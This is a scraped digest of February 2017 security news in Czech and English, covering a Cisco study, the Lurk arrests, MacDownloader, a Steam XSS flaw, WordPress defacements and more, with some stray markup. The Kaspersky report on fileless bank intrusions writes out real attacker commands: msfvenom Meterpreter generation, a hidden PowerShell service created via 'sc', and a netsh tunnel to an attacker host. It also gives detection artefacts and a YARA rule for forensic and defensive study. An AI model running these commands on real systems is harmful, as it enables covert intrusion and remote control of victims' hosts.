Studie dále zkoumala, jaký dopad mají úspěšné kybernetické útoky na tržby nejenom velkých firem, ale i malých a středních podniků. Téměř čtvrtina organizací (22 %), na které byl veden úspěšný útok, ztratily své zákazníky a 40 % z nich přišlo o více než pětinu své zákaznické základny. Podobně se snížily i jejich tržby. Celých 29 % úspěšně napadených organizací zaznamenalo nižší příjmy, 38% z nich pak ztratilo více než 20 % objemu tržeb. Přestože ztráty způsobené kybernetickými útoky jsou významné, naše studie zjistila, že až 44 % bezpečnostních incidentů zůstává ignorováno a dále nevyšetřeno. Důkladná analýza přestálého útoku je přitom nezbytná, aby organizace mohla vylepšit svá bezpečnostní opatření, říká Milan Habrcetl, bezpečnostní expert společnosti Cisco ČR.
Nejrozšířenější exploit kity ustupují, přicházejí nové
Studie zjistila, že nejrozšířenější nástroje pro šíření škodlivého softwaru (tzv. exploit kity) téměř vymizely. Exploit kity Angler, Nuclear, Neutrino a RIG dříve patřily mezi nejpoužívanější. V listopadu 2016 však byl jediným aktivním RIG.
Ústup exploit kitu Angler souvisí se zatčením 50 ruských hackerů na jaře 2016, kteří využívali malware Lurk k útokům na ruské banky. Výzkumníci společnosti Cisco totiž zjistili úzké propojení mezi malwarem Lurk a exploit kitem Angler.
To však neznamená sníženou aktivitu útočníků. Na jejich místo nastupují jiné formy, například Sundown, Sweet Orange a Magnitude. Stejně jako RIG cílí tyto exploit kity na zranitelnosti v Microsoft Internet Exploreru, Flashi a v aplikační platformě Silverlight.
Spousta různých řešení a cloud
Ze závěrů studie vyplývá, že 55 % organizací používá bezpečnostní řešení více než 5 výrobců, 3 % organizací dokonce uvedly, že mají produkty od více než 50 výrobců. Složitost bezpečnostní architektury však může paradoxně pomoci útočníkům. Ti mají více času a prostoru pro zahájení útoku. Ne všechna řešení jsou totiž kompatibilní a ne všechna zařízení v síti bývají chráněna všemi nainstalovanými bezpečnostními produkty.
Organizacím navíc taková situace stěžuje hledání bezpečnostních odborníků, neboť práce s mnoha nástroji výrazně zvyšuje nároky na kvalifikaci lidí. A právě nedostatek odborníků vnímají bezpečnostní ředitelé jako jedno z hlavních omezení pro vybudování kvalitního zabezpečení, uvádí Milan Habrcetl. Ve výzkumu to potvrdilo 25 % dotázaných. Mezi dalšími omezeními byly zmíněny: limitovaný rozpočet (38 %), potíže s kompatibilitou systémů (28 %) a potřebné certifikace (25 %).
Zároveň se zvyšuje množství nasazovaných cloudových aplikací. Počet cloudových aplikací, které zaměstnanci využívají, se za dva roky více než zdesetinásobil. Bezpečnostní tým Cisco CloudLock zkoumal 900 organizací a jejich zaměstnanci používali v říjnu 2014 celkem 20 400 různých cloudových aplikací, zatímco v říjnu 2016 už zhruba 222 000. Více než čtvrtina z nich (27 %) byla vyhodnocena jako vysoce riskantní. Zajištění ochrany v souvislosti s narůstajícím objemem cloudového provozu tak patří mezi hlavní body zájmu bezpečnostních manažerů.
a href="https://i.iinfo.cz/images/108/spam-objem-1.png"Spousta různých řešení a cloud
Russia Detains Nine 'Hackers' Over $17 Million Bank Thefts
8.2.2017 Securityweek Hacking
Russia has detained nine people alleged to be part of a cybercrime ring accused of stealing some $17 million dollars from bank accounts, the interior ministry said Wednesday.
The detentions followed a nationwide manhunt. The FSB security agency launched a major operation last year against the alleged 50-strong "hacker group" that pilfered more than one billion rubles ($16.8 million, 15.8 million euros) since 2013, the statement said.
"Nine individuals suspected of participating in hacking attacks were detained on January 25," ministry spokeswoman Irina Volk said. One was placed under arrest.
A total of 27 members and organizers are being investigated, with 19 of them now under arrest in pre-trial jail, the ministry said.
Unnamed security sources on Wednesday told Russian agencies that the latest arrests are connected to a case against legendary hacking collective Lurk that was targeted by law enforcement agencies in a sweep last year.
According to cybersecurity giant Kaspersky, the group was reportedly suspected of stealing some three billion rubles from commercial organisations that included banks.
Russian hackers are in the spotlight over their alleged involvement in cyberattacks targeting the US presidential election campaign but experts say the vast majority of cybercrime in the country is financial.
The FSB itself is also currently caught up in another murky scandal that has seen at least two of its top cybersecurity experts arrested for treason linked to the United States, a lawyer involved in the case has said.
That treason case has also seen the arrest of Ruslan Stoyanov -- the head of Kaspersky's cybersecurity unit that probed Lurk.
Sophos to Acquire Invincea for up to $120 Million
8.2.2017 Securityweek Virus
IT security firm Sophos announced on Wednesday that it has agreed to acquire Invincea, a provider of endpoint security solutions that leverage virtual containers to protect against advanced malware and other threats.
Under the terms of the agreement Sophos will pay $100 million in cash to buy the endpoint protection firm, with a possible $20 million earn-out.
Headquartered in Fairfax, Va., Invincea was founded by chief executive officer Anup Ghosh, and has raised more than $50 million in funding.
Invincea’s flagship product X uses “deep learning neural networks and behavioral monitoring” to detect previously unseen malware and stops attacks.
According to Kris Hagerman, chief executive officer at Sophos, Invincea’s technology will strengthen Sophos' recently launched Intercept X product, which includes set of next-generation technologies such as the signature-less anti-malware, anti-exploit and anti-ransomware technology.
“The Invincea machine learning malware detection and prevention technology will be fully integrated into the Sophos endpoint protection portfolio,” Sophos explained. “The availability of Invincea technology through the Sophos Central security management platform will further enhance the Sophos synchronized security portfolio and real-time intelligence sharing.”
"Invincea was created to address sophisticated threats from nation state actors and cyber criminals that were successfully evading traditional network and antivirus solutions," Ghosh wrote in a blog post. "We understood that signature based defenses were nearing the end of their useful life, and alternative non-signature based solutions were needed."
Norm Laudermilch, chief operating officer and head of product development at Invincea added, "Invincea set out to disrupt the traditional approach to antivirus, and even now no single technology is enough to fully protect customers. I share the Sophos vision for bringing together a powerful ensemble of next-gen technologies to dramatically improve the overall effectiveness of endpoint protection. Along with our world-class technical team at Invincea, I'm looking forward to joining Sophos and helping deliver on this ambitious and exciting vision."
Sophos said it would retain Invincea’s office in Fairfax, and Ghosh and COO Norm Laudermilch will join Sophos in key leadership positions.
For Invincea customers, the Invincea endpoint security portfolio will continue to be supported and sold by Invincea and available via Invincea's channel partners.
Invincea Labs, a division of Invincea that invents, prototypes and engineers technologies for government and industry, has been separately managed and operated since 2012, and is not part of this transaction.
Iranian hackers are back with the MACDOWNLOADER MAC malware
8.2.2017 Securityweek Apple
An Iranian espionage group has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac users.
A cyber espionage group linked to the Iranian Government has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac computers.
The researchers Claudio Guarnieri and Collin Anderson have analyzed the malicious code that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.
The attacks analyzed by the two researchers were mainly focused on the defense industrial base sector, but it is known that the same threat was used against a human rights advocate.
According to the researchers, the malware was first “poorly” developed the end of 2016, the experts noticed its code was copied from other sources. Anyway, at the time of writing the analysis, MacDownload is undetected by virus scanning engines on VirusTotal, while at the time I was writing just a dozen vendors have recognized the bogus Flash Player and Bitdefender apps as a threat.
Once the MacDownloader infects a device, the malware collects information about the host, including passwords stored in the Keychain.
“MacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager – which mirrors the focus of Windows malware developed by the same actors.” reads the analysis published by the security duo.
The malicious code was first spotted on a fake website of the aerospace firm United Technologies Corporation, that same site that was used in the past to spread a Windows malware and the Browser Exploitation Framework (BeEF).
The malware researchers linked the MacDownloader with the activity of an Iranian threat actor known as Charming Kitten (aka Newscaster and NewsBeef).
Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.
Iranian Hackers used a network of fake accounts (NEWSCASTER network) on principal social media to spy on US officials and political staff worldwide, this is reported in an analysis done by iSIGHT Partners. The Charming Kitten group is also known for the abuse of Open Source Security Tools, including the BeEF.
The analysis of the malware revealed that the authors have attempted to implement remote update and persistence capabilities, but both features don’t work.
“It appears that the application contains an unused attempt to install persistent access to the victim host. One segment provides a poorly-implemented shell script to save a response from the C2 and mark it for persistence by writing an entry in the /etc/rc.common file. In theory, every time the infected computer would start up, the shell script would be launched to download a file from a remote location, check if it changed from the previous iteration, and if so execute that new implant. While we haven’t managed to obtain a proper response from the server before it was taken offline, our initial investigation did not find a subsequent implant.” states the analysis.
The experts have collected evidence that links the malware to other Iranian threat actors, including the Iran Cyber Security Group and Flying Kitten (aka Rocket Kitten).
“Of particular note are wireless networks named Jok3r and mb_1986. Jok3r corresponds with a member of a defacement group, Iran Cyber Security Group, who continues to be fairly active in vandalizing sites. Iran Cyber Security Group also, as with many other defacement groups later identified as involved in state-aligned campaigns, purports to provide commercial security services and penetration testing training.” states the report.
“The “mb_1986″ wireless name is more interesting, as it provides a connection to earlier Iranian campaigns, overlapping with the Flying Kitten actor group and subsequent malware activity in summer 2014.”
The report also includes the IoCs, enjoy it!
Absolute Extends Self-Healing Capabilities to Third-Party Software
8.2.2017 securityweek Security
Vancouver, Canada-based endpoint security company Absolute announced this week the launch of a new product that provides self-healing capabilities to third-party security and management applications.
Absolute’s Persistence technology is embedded in the firmware of over one billion PCs and mobile devices from manufacturers such as Dell, ASUS, HP, Microsoft, Lenovo, Acer, Samsung, Toshiba, Panasonic and Fujitsu. This approach aims to ensure that IT teams are provided uncompromised visibility and real-time remediation capabilities for devices, data and applications.
The company’s Absolute Device & Data Security (DDS) product is designed to allow organizations to monitor endpoints and data stored on computers and cloud storage devices, and quickly address incidents.
Absolute has now announced the availability of Application Persistence, a product that provides self-healing capabilities to third-party endpoint controls, including antiviruses, VPNs, encryption, and management tools.
A recent study has shown that more than half of enterprises have at least six agents installed on their endpoints, and when one of these agents is removed or compromised, the organization can remain exposed to further attacks.
Absolute’s technology aims to address the risk by allowing endpoint agents to repair themselves when removed or compromised by external actors or insider threats, giving enterprises more control over their endpoints, including improved visibility and real-time remediation. Furthermore, it provides IT teams the capabilities needed to ensure that compliance requirements are met.
The company says the self-healing capabilities work even if the machine is not on the corporate network, its firmware is flashed, the hard drive is replaced, or the operating system is reinstalled.
Absolute said its Application Persistence product has already been tested by organizations in the healthcare, financial services and manufacturing industries. The product is available worldwide to enterprises, OEMs, security firms, and independent software vendors (ISVs).
Fileless attacks against enterprise networks
8.2.2017 Kaspersky Virus
During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“.
Description
This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab’s product detection names for such kinds of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the attacker´s C2.
We know that the Metasploit framework was used to generate scripts like the following one:
This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These kind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line options:
msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host. This can be done, for example, using the following command:
sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual
The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
That would result in all network traffic from 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique of setting up proxy tunnels will provide the attackers with the ability to control any PowerShell infected host from remote Internet hosts.
The use of the “SC” and “NETSH” utilities requires administrator privileges both in local and remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, attackers used credentials from Service accounts with administrative privileges (for example backup, service for remote task scheduler, etc.) grabbed by Mimikatz.
Features
The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.
In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:
cat mal_powershell.ps1_4 | cut -f12 -d” ” | base64 -di | cut -f8 -d\’ | base64 -di | zcat – | cut -f2 -d\( | cut -f2 -d\” | less | grep \/ | base64 -di | hd
Resulting in the following payload:
Part of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”
Victims
Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below show the number of infections per country.
However we cannot confirm that all of them were infected by the same attacker.
Attribution
During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible. This closest groups with the same TTPs are GCMAN and Carbanak.
Conclusions
Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately the use of common tools combined with different tricks makes detection very hard.
In fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.
After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration of a network and how standard and open source utilities make attribution almost impossible.
Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.
More information about this attack is available to customers of Kaspersky APT Intelligence Services. For a subscription inquiry, contact: intelreports (at) kaspersky [dot] com.
Appendix I – Indicators of Compromise
To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:
HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the SC utility
HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the NETSH utility
In unallocated space in the Windows registry, the following artefacts might be found:
powershell.exe -nop -w hidden -e
10.10.1.12/8080
10.10.1.11/4444
Please note that these IPs are taken from the IR case in which we participated, so there could be any other IP used by an eventual attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.
Verdicts:
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg.c
HEUR:Trojan.Multi.Powecod
Appendix II – Yara Rules
rule msf_or_tunnel_in_registry
{
strings:
$port_number_in_registry = “/4444”
$hidden_powershell_in_registry = “powershell.exe -nop -w hidden” wide
condition:
uint32(0)==0x66676572 and any of them
}
1
2
3
4
5
6
7
8
rule msf_or_tunnel_in_registry
{
strings:
$port_number_in_registry = “/4444”
$hidden_powershell_in_registry = “powershell.exe -nop -w hidden” wide
condition:
uint32(0)==0x66676572 and any of them
}
Iranian Hackers Use Mac Malware to Steal Data
8.2.2017 securityeek Virus
Iranian cyber espionage
A cyber espionage group linked to Iran has been using an unsophisticated piece of malware named MacDownloader to steal credentials and other data from Mac computers.
The malware was analyzed by Claudio Guarnieri and Collin Anderson, researchers specializing in Iranian surveillance and espionage campaigns targeting human rights, foreign policy and civil society entities.
MacDownloader, disguised by attackers as a Flash Player update and a Bitdefender adware removal tool, was created towards the end of 2016. Much of the code has been copied from other sources and experts believe this could be an amateur developer’s first attempt at creating a piece of malware.
When Guarnieri and Anderson conducted their analysis, the malware had not been known to any of the security products on VirusTotal. At the time of writing, nearly a dozen vendors have flagged the fake Flash Player and Bitdefender apps as malicious.
MacDownloader was first spotted on a fake website of aerospace firm United Technologies Corporation, which had previously delivered Windows malware. The same host had also been used to deploy the Browser Exploitation Framework (BeEF) on sites apparently belonging to the U.S. Air Force and a dental office.
While the attacks observed by Guarnieri and Anderson appear to be targeted at the defense industrial base sector, the experts are aware of reports that it has also been used against a human rights advocate.
Evidence suggests that the macOS malware is tied to Charming Kitten, aka Newscaster and NewsBeef, an Iranian threat actor known for creating fake personas on social networking websites in an effort to harvest information from targeted individuals in the US, Israel, the UK, Saudi Arabia and Iraq. Charming Kitten is also known for using BeEF.
Once it infects a device, the malware harvests information about the system, including processes and applications, and collects passwords stored in the Keychain. The Windows malware used by the group is similar, collecting saved credentials and browser history from Chrome and Firefox.
While its code shows that the developers of MacDownloader have attempted to implement remote update and persistence capabilities, these mechanisms don’t appear to be functional.
Researchers have found links between MacDownloader and other threat actors believed to be located in Iran, including the Iran Cyber Security Group, which specializes in defacing websites, and Flying Kitten (aka Rocket Kitten), which is known for targeting organizations in the Middle East and NATO countries.
Valve is going to fix a serious vulnerability in Steam online gaming platform
8.2.2017 securityeek Vulnerebility
The online game platform Steam is fixing a serious bug that could be exploited to redirect users to malicious websites and take over their profile.
The popular online game platform Steam is going to fix a serious vulnerability that could be exploited by hackers to redirect users to malicious websites, use their market funds, and also change their profile.
It seems that the XSS exploit on Steam Profiles has been only partially fixed, it seems that the flaw had been fixed only the initial activity feed pages, but it is still present on subsequent pages.
The attackers can exploit the flaw by inserting JavaScript and other malicious code into their profiles, then the code is executed without any warning on the computers of anyone who visits the booby-trapped page.
The vulnerability was first reported in a Reddit thread this week, and experts observed that in a few hours after its disclosure many people were creating profiles that contained the code to trigger the vulnerability.
According to Ars, most of the exploit pages just redirect visitors to a site with PHP code that prompts them to download an unknown file.
“Such redirections, however, are possibly only a small sample of what the underlying exploit makes possible. One Reddit participant said here and here that viewing malicious profiles could force people to make purchases using their Steam market funds.” reported the Ars.
Clearly, the flaw in the Steam platform could be also exploited to steal authentication cookies used and control the user accounts of the visitors.
It is expected that the number of infected profiles would rapidly grow because it is enough that users visit an existing malicious profile.
Steam
The Steam platform was already exploited by hackers in the past to launch cyber attacks. In October 2016, the malware researcher Lawrence Abrams discovered a Reddit user which is warning of the existence of hacked Steam accounts used to spread a Remote Access Trojan (RAT).
In March 2016, the security expert at Kaspersky Lab, Santiago Pontiroli, and Bart P, an independent security researcher, published an interesting analysis of malware targeting the Steam gaming platform and evolution of threats through the last few years,
Valve estimated that nearly 77,000 accounts are hijacked and pillaged each month.
Back to the present, Steam users who think they may have visited a malicious profile urge to check their settings and should change their passwords. I always suggest also to enable two-factor authentication to avoid ugly surprises.
Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability
8.2.2017 thehackernews Hacking
Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites.
To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.
But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers.
While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches.
Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports.
The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks.
The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites.
In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with "Hacked by" messages. Rest campaigns have targeted roughly 1000 pages in total.
Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning.
"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri.
"There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."
So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers.
U.S. Could Ask Visa Applicants for Social Media Passwords
8.2.2017 securityweek Social
US embassies could ask visa applicants for passwords to their own social media accounts in future background checks, Homeland Security Secretary John Kelly said Tuesday.
Kelly said the move could come as part of the effort to toughen vetting of visitors to screen out people who could pose a security threat.
He said it was one of the things under consideration especially for visitors from seven Muslim majority countries with very weak background screening of their own -- Iran, Iraq, Libya, Somalia, Sudan, Syria and Yemen.
"We're looking at some enhanced or some additional screening," Kelly told a hearing of the House Homeland Security Committee. "We may want to get on their social media, with passwords," he said.
"It's very hard to truly vet these people in these countries, the seven countries... But if they come in, we want to say, what websites do they visit, and give us your passwords. So we can see what they do on the internet."
"If they don't want to cooperate, then they don't come in" to the United States, he said.
Kelly stressed that no decision had been made on this, but said tighter screening was definitely in the future, even if it means longer delays for awarding US visas to visitors.
"These are the things we are thinking about," he said.
"But over there we can ask them for this kind of information and if they truly want to come to America, then they will cooperate. If not, next in line."
The seven countries were targeted in president Donald Trump's January 27 immigrant and refugee ban order, which has sense been at least temporarily blocked under court order.
Google Challenges Search Warrant Ruling
8.2.2017 securityweek Security
Google is planning to appeal a ruling made Friday that it must comply with search warrants involving customer data stored on servers outside of the United States. The case is similar to an earlier case involving Microsoft. In July 2016, the 2nd U.S. Circuit Court of Appeals in New York said Microsoft could not be forced to turn over emails stored on a server outside of the US. Now, however, Magistrate Judge Thomas Rueter in Philadelphia has taken the opposite view with Google.
Both cases involve search warrants issued under the 1986 Stored Communications Act (SCA). Microsoft was also initially ordered to comply. It appealed, and eventually Judge Susan Carney of the appeals court said that the SCA does not give US courts authority to force internet companies in the United States to seize customer email contents stored on foreign servers. At the time, Microsoft chief legal officer Brad Smith said, "It makes clear that the US Congress did not give the US Government the authority to use search warrants unilaterally to reach beyond US borders."
Google expected this precedent to be upheld in its own refusal to comply with a similar search warrant. The government's key argument is that no search is undertaken on foreign soil -- the data is lawfully brought back to the US, and the search is lawfully conducted within the US. For Microsoft, this argument was rejected; but for Google it has been accepted.
"Though the retrieval of the electronic data by Google from its multiple data centers abroad has the potential for an invasion of privacy, the actual infringement of privacy occurs at the time of disclosure in the United States," Rueter wrote.
Google has said it will appeal the ruling. "The magistrate in this case departed from precedent, and we plan to appeal the decision. We will continue to push back on overbroad warrants," it said in a statement.
If the appeal process fails, the case could have serious implications for US/EU business relations. EU data protection laws prevent the export of European personal information to any country that does not have adequate (that is, equivalent) data protection laws. That exclusion would include the US were it not for the special agreement known as Privacy Shield. It is the Privacy Shield that allows US tech giants such as Google and Facebook to operate in Europe; but it also allows any US commercial business to trade with the European Union.
Many commentators believe that Privacy Shield will fail European constitutional examination. It currently exists largely because of the political will on both sides to make it exist; but that will is already being eroded by new President Trump's apparent isolationism and support for US law enforcement.
Speaking to SecurityWeek about the effect of President Trump's executive order titled 'Enhancing Public Safety in the Interior of the United States' might have on Privacy Shield, David Flint (a senior partner at the MacRoberts law firm) commented, "It is unclear at this stage..." But he also added, "The more concerning issue for Privacy Shield is that there is a possible carve out for national security and similar issues and it remains unclear as to the extent that the new Administration will seek to define all foreigners' PII as 'a security issue'."
Privacy Shield, he explained, "is a complex interconnected matrix of law, policy and 'comfort letters'; absent any of these three legs, it is likely that some national data protection authorities may consider that there is no longer confidence in the implementation of that matrix (of which many were skeptical) and declare the US as having inadequate protection - now, and certainly after GDPR implementation."
Poland-based privacy consultant Alexander Hanff was more forthright. "Trump's Executive Order has accelerated the demise of a transatlantic lie - a lie which would have been exposed eventually by the CJEU [the Court of Justice, Europe's ultimate constitutional court] anyway; a lie which circumvents the constitutional rights of EU Citizens."
With such concern over an executive order that does not directly deal with European PII, it is difficult to see how US government access to European data directly from US companies -- especially when the data may be physically stored in Europe -- can withstand a legal challenge to the European courts. It is fair to say that in the current climate, if Google is forced to hand over foreign data on the basis of a search warrant, it could prove the end of Privacy Shield. Search warrants and the FBI could be as toxic to Privacy Shield as Prism and the NSA were to its predecessor Safe Harbor.
LOGmanager umí nově kooperovat i s jinými systémy správy logů
8.2.2017 SecurityWorld Software
Novou verzi systému LOGmanager, českého nástroje na správu a analýzu logů, uvedla na trh Sirwisa.
Mezi vylepšení nové verze patří například možnost přeposílání záznamů na nadřazené SIEM systémy jiných výrobců, kde se mohou logy podrobit pokročilé analýze nebo se korelují s informacemi z jiných zdrojů.
Novinky LOGmanageru verze 2.2.0 podle výrobce:
podpora pro přeposílání událostí na nadřazený syslog server
podpora pro příjem a parsování událostí v LEEF formátu
tlačítko na otestování spojení s aktualizačním serverem (System > Software)
vylepšená konfigurace webserveru (povolené je pouze TLSv1.2 šifrování spojení, přidány HSTS bezpečnostní hlavičky)
upravené dashboardy (zvětšené pole pro zadávání názvu polí, vylepšení pro zobrazování práce s Windows soubory, zobrazování alertů, postfix/sendmail a Windows Logons)
u blockly byla vypnutá funkce zoom na kolečku myši
Podstatou LOGmanageru je sběr všech relevantních eventů a logů organizace, jejich ukládání do centrálního zabezpečeného úložiště s předem definovanou retencí a možností prohledávat enormní množství dat v reálném čase. Výstupy prohledávaní se prezentují v textové i grafické podobě s vysokou mírou interakce vzhledem k nalezeným datům.
Systém rovněž umožňuje dlouhodobě ukládat data v nezpochybnitelné podobě pro potřeby shody s předpisy, požadavky pro forenzní analýzu a případné bezpečnostní audity. Řešení rovněž pomáhá plnit požadavky dané ze Zákona o kybernetické bezpečnosti.
Distributorem řešení LOGmanager v tuzemsku je firma Veracomp, pro implementaci lze využít i služeb řady certifikovaných partnerů.
Kyberzločinci vyřadili z provozu web rakouského parlamentu
7.2.2017 Novinky/Bezpečnost Kyber
Počítačoví piráti v neděli na zhruba dvacet minut vyřadili z provozu webové stránky rakouského parlamentu, k žádným neveřejným datům se ale nedostali. V prohlášení to uvedl parlament s tím, k žádným škodám nedošlo a že případem se zabývají bezpečnostní úřady. K činu se mezitím přihlásila turecká islamistická skupina Tým lvích vojáků (ANT), uvedla agentura Reuters.
"Napadení hackery bylo podle všeho vedeno takzvaným DDoS útokem, terčem podobného útoku byly loni v prosinci weby ministerstva zahraničí a obrany," upřesnil v prohlášení parlament.
Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
ANT na svém webu uvádí, že chrání vlast, islám, národ a vlajku. Reuters poznamenal, že vztahy mezi Tureckem a Rakouskem v loňském roce značně ochladly poté, co Rakousko vyzvalo ke zmrazení přístupových rozhovorů mezi Evropskou unií a Ankarou.
Vídeň tak reagovala především na počínání tureckých úřadů po loňském neúspěšném pokusu o svržení prezidenta Recepa Tayyipa Erdogana. ANT rovněž na webu oznámil, že provádí operace proti prokurdské Lidové demokratické straně (HDP), rakouské centrální bance a jistému rakouskému letišti.
Útokům čelilo i Česko
Masivním útokům typu DDoS čelily v roce 2013 některé tuzemské servery. Směřovány byly nejprve na zpravodajské weby, potom na portál Seznam.cz, servery bank a telefonních operátorů.
Podle bezpečnostních expertů šlo tehdy o největší kybernetický útok v celé historii Česka.
„Musíme ověřit svůj účet informace!“ Špatný phishing tentokrát míří na zákazníky Fio Bank
7.2.2017 Živě.cz Phishing
Další bankou, která upozorňuje na phishingové útoky na její klienty, je Fio Bank. Nebezpečné e-maily rozesílají útočníci v těchto dnech a naštěstí jsou dobře rozeznatelné díky strojovému překladu s lámanou češtinou. Ani to však nemusí nejméně ostražitým uživatelům zabránit v kliknutí na odkaz a zadání přístupových údajů do podvodného formuláře.
Ani velmi špatná čeština často nemusí odradit uživatele ke kliknutí na odkaz a zadání údajů do podvodného formuláře (foto: Fio Bank)
E-maily mohou přijít například z adresy kontakt@fiobanka.prihlaste.cz. Web Přihlaste.cz přitom opravdu sdružuje weby internetového bankovnictví českých bank, ale i přihlašovací stránky sociálních sítí.
V každém případě neklikejte na odkaz v doručené zprávě a e-mail přesuňte do spamu nebo jej rovnou smažte. Pokud do podvodného formuláře zadáte svoje údaje, kontaktujte urychleně zákaznickou podporu.
Útočník ovládl 160 000 tiskáren, tiskne na nich varování před útoky
7.2.2017 Root.cz Hacking
„Pro lásku boží, zavřete si ten port,“ objevuje se na ASCII-artových letácích, které vyjíždějí ze 160 000 tiskáren po celém světě. Hodný hacker se tak snaží upozornit na bezpečnostní chybu v PostScriptu.
Skupina odborníků z University Alliance Ruhr objevila chybu „cross-site printing“ (XSP) ve staré implementaci PostScriptu a PJL v laserových tiskárnách. Chyba se týká tiskáren zvučných jmen jako Dell, Brother, Konica, Samsung, HP a Lexmark. Úspěšný útočník ji může zneužít ke získání hesel, dolování citlivých údajů z tiskové fronty nebo k odstavení zařízení.
Stará chyba v PS a PJL
